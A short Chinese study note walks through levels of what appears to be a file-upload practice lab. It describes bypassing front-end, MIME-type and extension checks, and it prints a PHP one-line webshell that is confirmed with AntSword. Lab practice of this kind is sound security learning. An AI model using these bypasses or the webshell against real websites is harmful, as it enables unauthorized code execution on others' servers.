pass1
上传一个文件,然后f12 查看前端
找到判断条件对应的函数,将其删除
在图片上右击,复制图像链接,得到上传路径
上传成功的一种样子
另一种验证方式
通过蚁剑连接成功说明上传成功
pass1是前端验证(上传文件非常快的弹出弹窗就是前端验证)相当于没有验证,因为能看到的都是可以改的
pass2
MIME验证 (上传的文件中通过content-type来进行验证 看你上传的文件是不是图片例如image/png)
通过bp抓包找到content-type这个验证,更改为图片类型
通过抓包和改包就可以将文件成功上传
因为上传的是一句话木马,所以通过蚁剑来验证是否成功上传
(一句话木马:<?php eval($_post['111']);?>)
pass6,7,8,9
验证上传文件后缀名
通过更改文件后缀名就可以上传成功
(1.更改大小写 2.末尾加点 3.末尾空格 4. 文件名末尾加::$DATA)四种方式进行绕过
windows系统会自动将文件末尾空格和点给删去可以通过抓包改包来实现
在这个情况中需要将::$data给去掉
这样就可以了
pass10
通过改两个条件来完成
pass11:可以通过大小写绕过,也可通过更改文件名为pphpphp